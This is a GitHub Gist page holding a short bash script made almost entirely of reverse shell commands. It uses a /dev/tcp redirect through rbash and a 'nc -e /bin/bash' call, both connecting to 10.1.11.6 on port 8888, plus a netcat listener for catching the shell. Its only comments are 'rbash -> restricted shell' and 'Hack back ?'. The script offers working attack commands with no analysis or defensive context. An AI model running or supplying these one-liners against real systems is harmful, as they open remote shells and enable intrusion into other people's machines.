Last active
July 1, 2019 13:02
-
-
Save int0TheW1ld/b155e0761546df4369e8aab740a18c95 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # rbash -> restricted shell | |
| rbash -i >& /dev/tcp/10.1.11.6/8888 0>&1 | |
| # Hack back ? | |
| nc 10.1.11.6 8888 -e /bin/bash; | |
| nc -lvp 8888 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment